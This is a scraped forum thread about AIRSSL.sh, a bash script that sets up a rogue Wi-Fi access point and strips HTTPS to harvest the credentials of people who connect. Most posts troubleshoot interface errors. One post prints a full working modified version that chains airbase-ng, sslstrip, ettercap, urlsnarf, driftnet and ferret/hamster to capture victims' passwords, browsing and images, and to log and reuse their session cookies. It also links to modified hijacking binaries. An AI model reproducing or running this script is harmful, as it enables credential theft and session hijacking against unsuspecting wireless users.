NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

I got error, Cant get IP adress!

I use Intel 3945ab wireless adapter for receiving internet, and rtl8187 for fake AP...
Have anyone solution for this prob?

When çi run the script çi get this error after the airbase is trying to configure at0:

at0: ERROR while getting interface flags: no such device

I tried both scripts 1.0, 2.0
I have a rtl8187, internet adap eth0, fake ap wlan0....

What am I doing wrong?

thanks!!!

Hello.
How can i configure fake ap to use wpa2 key?
I try to use internet interface a broadband modem(ppp0 interface), but on client i can`t get internet connection. Any walkaround?

Hi, I'm having the next error:

Code:

---

root@bt:~# /root/airssl.sh

AIRSSL 2.0 - Credits killadaninja & G60Jon

0.0.0.0        192.168.2.1    0.0.0.0        UG    0      0        0 eth0


Enter the networks gateway IP address, this should be listed above. For example 192.168.0.1:
192.168.2.1
Enter your interface that is connected to the internet, this should be listed above. For example eth1: eth0
Enter your interface to be used for the fake AP, for example wlan0: wlan0
Enter the ESSID you would like your rogue AP to be called: Nancy


Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID    Name
8976    dhclient
8995    dhclient


Interface      Chipset        Driver

wlan0          RTL8187        rtl8187 - [phy0]
                                (monitor mode enabled on mon6)
mon0            RTL8187        rtl8187 - [phy0]
mon1            RTL8187        rtl8187 - [phy0]
mon2            RTL8187        rtl8187 - [phy0]
mon3            RTL8187        rtl8187 - [phy0]
mon4            RTL8187        rtl8187 - [phy0]
mon5            RTL8187        rtl8187 - [phy0]

[+] Configuring FakeAP....

Airbase-ng will run in its most basic mode, would you like to
configure any extra switches?

Choose Y to see airbase-ng help and add switches.
Choose N to run airbase-ng in basic mode with your choosen ESSID.
Choose A to run airbase-ng in respond to all probes mode (in this mode your choosen ESSID is not used, but instead airbase-ng responds to all incoming probes), providing victims have auto connect feature on in their wireless settings (MOST DO), airbase-ng will imitate said saved networks and victim will connect to us, likely unknowingly. PLEASE USE THIS OPTION RESPONSIBLY.
Y, N or A
N
[+] Configuring forwarding tables...
at0: ERROR while getting interface flags: No such device
SIOCSIFADDR: No such device
at0: ERROR while getting interface flags: No such device
SIOCSIFNETMASK: No such device
SIOCSIFMTU: No such device
SIOCADDRT: No such process
[+] Setting up DHCP...
[+] Starting sslstrip...
[+] Configuring ettercap...

Ettercap will run in its most basic mode, would you like to
configure any extra switches for example to load plugins or filters,
(advanced users only), if you are unsure choose N
Y or N

---

What can be the problem?

I have mi wired network in eth0
My wireless wlan0

Thanks!

Fettmaster I have the same issue....

Hey noobie here i am having problems with airssl.sh here are the adapters i am using

wlan0 Atheros ath5k - [phy0]
ra0 Ralink 2560 PCI rt2500


the ra0 is an alfa AWUS036nh
the wlan0 is my internet connection

here is my problem i have tried to kill the processes using sudo kill ---
and the just keep popping up with new process numbers also i get the at0 errors seen below if you need any more in pleas let me know

AIRSSL 2.0 - Credits killadaninja & G60Jon

0.0.0.0 192.168.0.1 0.0.0.0 UG 0 0 0 wlan0


Enter the networks gateway IP address, this should be listed above. For example 192.168.0.1:
192.168.0.1
Enter your interface that is connected to the internet, this should be listed above. For example eth1: wlan0
Enter your interface to be used for the fake AP, for example wlan0: ra0
Enter the ESSID you would like your rogue AP to be called: mine


Found 3 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID Name
11282 wpa_supplicant
11291 dhclient
11356 dhclient
Process with PID 11282 (wpa_supplicant) is running on interface wlan0
Process with PID 11356 (dhclient) is running on interface wlan0


Interface Chipset Driver

wlan0 Atheros ath5k - [phy0]
ra0 Ralink 2560 PCI rt2500 (monitor mode enabled)

[+] Configuring FakeAP....

Airbase-ng will run in its most basic mode, would you like to
configure any extra switches?

Choose Y to see airbase-ng help and add switches.
Choose N to run airbase-ng in basic mode with your choosen ESSID.
Choose A to run airbase-ng in respond to all probes mode (in this mode your choosen ESSID is not used, but instead airbase-ng responds to all incoming probes), providing victims have auto connect feature on in their wireless settings (MOST DO), airbase-ng will imitate said saved networks and victim will connect to us, likely unknowingly. PLEASE USE THIS OPTION RESPONSIBLY.
Y, N or A
a

[+] Starting FakeAP...
[+] Configuring forwarding tables...
at0: ERROR while getting interface flags: No such device
SIOCSIFADDR: No such device
at0: ERROR while getting interface flags: No such device
SIOCSIFNETMASK: No such device
SIOCSIFMTU: No such device
SIOCADDRT: No such process
[+] Setting up DHCP...
[+] Starting sslstrip...
[+] Configuring ettercap...

Hi all !
I'm not trying to hijack your thread, but your script inspired me (well, taught me to be more precise) and I made a script of my own, with different means though. It's much simpler and works for local use. I of course gave you credit in the thread that people can find here : http://www.backtrack-linux.org/forum...utomation.html if they're interested !

Concerning your script I made changes for my own use. For example, why do you use airmon-ng when you could just set your interface to monitor mode ? It worked better for me when using

Code:

---

ifconfig $fakeap_interface down
iwconfig $fakeap_interface mode monitor
ifconfig $fakeap_interface up

---

I also removed some xwindows that I found to be useless (sslstrip for example).

Anyway, great work, thanks !

(Check your PMs) EDIT : or don't, I couldn't send you one due to your box over load :p I sent it to your "visitor messages"

::EDIT::

I messed around a bit with this original scripting and added the option for URL snarf as well as using hamster / ferret to autolog cookies. It works locally, haven't tested it on other machines.

Here's the pastebin: http://pastebin.com/JxkdHuH6

Code:

---

#!/bin/bash
# (C)opyright 2009 - killadaninja - Modified G60Jon 2010 - Modified again by EODtech on backtrack-linux.org
# airssl.sh - v1.0
# visit the man page NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

# Network questions
echo
echo "AIRSSL 2.0 - Credits killadaninja & G60Jon  "
echo
route -n -A inet | grep UG
echo
echo
echo "Enter the networks gateway IP address, this should be listed above. For example 192.168.0.1: "
read -e gatewayip
echo -n "Enter your interface that is connected to the internet, this should be listed above. For example eth1: "
read -e internet_interface
echo -n "Enter your interface to be used for the fake AP, for example wlan0: "
read -e fakeap_interface
echo -n "Enter the ESSID you would like your rogue AP to be called: "
read -e ESSID
airmon-ng start $fakeap_interface
fakeap=$fakeap_interface
fakeap_interface="mon0"

# Dhcpd creation
mkdir -p "/pentest/wireless/airssl"
echo "authoritative;

default-lease-time 600;
max-lease-time 7200;

subnet 10.0.0.0 netmask 255.255.255.0 {
option routers 10.0.0.1;
option subnet-mask 255.255.255.0;

option domain-name "\"$ESSID\"";
option domain-name-servers 10.0.0.1;

range 10.0.0.20 10.0.0.50;

}" > /pentest/wireless/airssl/dhcpd.conf

# Fake ap setup
echo "[+] Configuring FakeAP...."
echo
echo "Airbase-ng will run in its most basic mode, would you like to
configure any extra switches? "
echo
echo "Choose Y to see airbase-ng help and add switches. "
echo "Choose N to run airbase-ng in basic mode with your choosen ESSID. "
echo "Choose A to run airbase-ng in respond to all probes mode (in this mode your choosen ESSID is not used, but instead airbase-ng responds to all incoming probes), providing victims have auto connect feature on in their wireless settings (MOST DO), airbase-ng will imitate said saved networks and victim will connect to us, likely unknowingly. PLEASE USE THIS OPTION RESPONSIBLY. "
echo "Y, N or A "
 

read ANSWER

if [ $ANSWER = "y" ] ; then
airbase-ng --help
fi

if [ $ANSWER = "y" ] ; then
echo
echo -n "Enter switches, note you have already chosen an ESSID -e this cannot be
redefined, also in this mode you MUST define a channel "
read -e aswitch
echo
echo "[+] Starting FakeAP..."
xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng "$aswitch" -e "$ESSID" $fakeap_interface & fakeapid=$!
sleep 2
fi

if [ $ANSWER = "a" ] ; then
echo
echo "[+] Starting FakeAP..."
xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -P -C 30 $fakeap_interface & fakeapid=$!
sleep 2
fi


if [ $ANSWER = "n" ] ; then
echo
echo "[+] Starting FakeAP..."
xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -c 1 -e "$ESSID" $fakeap_interface & fakeapid=$!
sleep 2
fi

# Tables
echo "[+] Configuring forwarding tables..."
ifconfig lo up
ifconfig at0 up &
sleep 1
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p udp -j DNAT --to $gatewayip
iptables -P FORWARD ACCEPT
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables --table nat --append POSTROUTING --out-interface $internet_interface -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

# DHCP
echo "[+] Setting up DHCP..."
touch /var/run/dhcpd.pid
chown dhcpd:dhcpd /var/run/dhcpd.pid
xterm -geometry 75x20+1+100 -T DHCP -e dhcpd3 -d -f -cf "/pentest/wireless/airssl/dhcpd.conf" at0 & dchpid=$!
sleep 3

# Sslstrip
echo "[+] Starting sslstrip..."
xterm -geometry 75x15+1+200 -T sslstrip -e sslstrip -f -p -k & sslstripid=$!
sleep 2

# Ettercap
echo "[+] Configuring ettercap..."
echo
echo "Ettercap will run in its most basic mode, would you like to
configure any extra switches for example to load plugins or filters,
(advanced users only), if you are unsure choose N "
echo "Y or N "
read ETTER
if [ $ETTER = "y" ] ; then
ettercap --help
fi

if [ $ETTER = "y" ] ; then
echo -n "Interface type is set you CANNOT use "\"interface type\"" switches here
For the sake of airssl, ettercap WILL USE -u and -p so you are advised
NOT to use -M, also -i is already set and CANNOT be redifined here.
Ettercaps output will be saved to /pentest/wireless/airssl/passwords
DO NOT use the -w switch, also if you enter no switches here ettercap will fail "
echo
read "eswitch"
echo "[+] Starting ettercap..."
xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -p -u "$eswitch" -T -q -i at0 & ettercapid=$!
sleep 1
fi

if [ $ETTER = "n" ] ; then
echo
echo "[+] Starting ettercap..."
xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -p -u -T -q -w /pentest/wireless/airssl/passwords -i at0 & ettercapid=$!
sleep 1
fi

# URLSnarf
echo
echo "[+] URLSnarf?"
echo
echo "Would you also like to start URL Snarf to see what webpages are being pulled up or something?"
echo "Y or N"
read URLSN
if [ $URLSN = "y" ] ; then
echo
echo "[+] Starting URLSnarf..."
xterm -geometry 75x20+1+500 -T URLSnarf -bg white -fg black -e urlsnarf -i at0 & urlsnid=$!
sleep 3
fi

#Impliment Ferret / Hamster for cookies!!!
echo
echo "[+] Hamster / Ferret?"
echo
echo "Would you like to start Hamster / Ferret to log (AND USE!) the vicim's cookies?"
echo
echo "BE SURE TO HAVE YOUR INTERNET COOKIES CLEARED, AND A PROXY MANUALLY SET TO 127.0.0.2 PORT 1233"
echo
echo "Then just visit http://hamster and set interface to eth0 or what ever you supplied for your internet facing connection :)"
echo
echo "NOTE:  Cookies will be logged, however they will all show up under your local IP address"
echo "Y or N"
read HAMSTER
if [ $HAMSTER = "y" ] ; then
echo
echo "[+] Starting Hamster / Ferret..."
xterm -geometry 75x10+500+0 -T Ferret -bg white -fb black -e /root/moddedhamster/ferret -i $internet_interface & ferretid=$!
sleep 1
xterm -geometry 75x10+500+100 -T Hamster -bg white -fb black -e /root/moddedhamster/hamster & hamsterid=$!
sleep 3
fi

# Driftnet
echo
echo "[+] Driftnet?"
echo
echo "Would you also like to start driftnet to capture the victims images,
(this may make the network a little slower), "
echo "Y or N "
read DRIFT

if [ $DRIFT = "y" ] ; then
mkdir -p "/pentest/wireless/airssl/driftnetdata"
echo "[+] Starting driftnet..."
driftnet -i $internet_interface -p -d /pentest/wireless/airssl/driftnetdata & dritnetid=$!
sleep 3
fi

xterm -geometry 75x15+1+600 -T SSLStrip-Log -e tail -f sslstrip.log & sslstriplogid=$!

clear
echo
echo "[+] Activated..."
echo "Airssl is now running, after victim connects and surfs their credentials will be displayed in ettercap. You may use right/left mouse buttons to scroll up/down ettercaps xterm shell, ettercap will also save its output to /pentest/wireless/airssl/passwords unless you stated otherwise. Driftnet images will be saved to /pentest/wireless/airssl/driftftnetdata "
echo
echo "[+] IMPORTANT..."
echo "After you have finished please close airssl and clean up properly by hitting Y,
if airssl is not closed properly ERRORS WILL OCCUR "
read WISH

# Clean up
if [ $WISH = "y" ] ; then
echo
echo "[+] Cleaning up airssl and resetting iptables..."

kill ${fakeapid}
kill ${dchpid}
kill ${sslstripid}
kill ${ettercapid}
kill ${dritnetid}
kill ${sslstriplogid}
kill ${urlsnid}
kill ${ferretid}
kill ${hamsterid}

airmon-ng stop $fakeap_interface
airmon-ng stop $fakeap
echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain

echo "[+] Clean up successful..."
echo "[+] Thank you for using airssl, Good Bye..."
exit

fi
exit

---

Keep in mind that you need to use my modified versions of hamster because for some reason the hamster port was showing up as in use, so I changed the default ip and port #. Just extract the tar to it's default folder in /root/ so they would be accessible at /root/moddedhamster/ferret -i eth0 for example. (download them here: http://www.mediafire.com/?7b12zu28185e1wp ) The instructions for hamster will show up when you get to that point.

Note to OP: If this is against your wishes in anyway, let me know and i'll pull the post.

-Adam

Quick question. I have been trying this script over the weekend and wondered if anyone has any luck with the following scenario. I have my laptop with wlan0 and wlan1 each work in monitor mode/ injection mode. wlan1 is a alfa card wlan0 is the internal wireless intel wireless n 1000. But what happens when I run the script is I use my windows computer to test to see if it is capturing information and I cant see the network I am broadcasting from wlan1 and I can not longer access the network I am connected to on wlan0 although I can still browse from the machine running the script. Am I too hopeful that this can all be done wirelessly? Or does anyone see any inherent failures in my description here. The script appears to start and run correctly just no networks. Are you supposed to shut down the other wireless and just use the ethernet?

Let me say I'm quite impressed with this little one. Here's my experience with it:
Running Macosx 10.6.6 on 13" Aluminium Unibody Macbook with the following config:
VM software: VirtualBox 4.0.4
BT: BT 4 Final
Internal Airport Wireless: Used for internet access to my home's AP
External USB Encore Wireless Dongle: FakeAP
In order to make it work I had to make some minor changes to what I thought would be a straightforward thing.
1) On the VM, instead of setting the interface as NAT, had to set it as Bridged so it directly connected with my network.
2) Had to pass control of the USB Wireless Dongle to the VM(obviously)
3) If I started the script after starting interfaces (/etc/init.d/networking start) this happened:

Code:

---

PID    Name
5024    dhclient3
5130    dhclient3
Process with PID 5130 (dhclient3) is running on interface wlan0

---

And DHCP wouldn't work for victims.
So in order to get it working, had to issue "killall dhclient3" prior to starting the script.

After this, it worked pretty good, the only problem is that I found it slow and unstable, I'm not sure if I should blame this cheap USB card or the script :)

What I still don't find how to fix is after I stop the script by pressing "y" when I want to rerun it it simply won't work. I guess all the housekeeping is not done there, any thoughts?

Once again I'd like to thank killadaninja for this nifty script.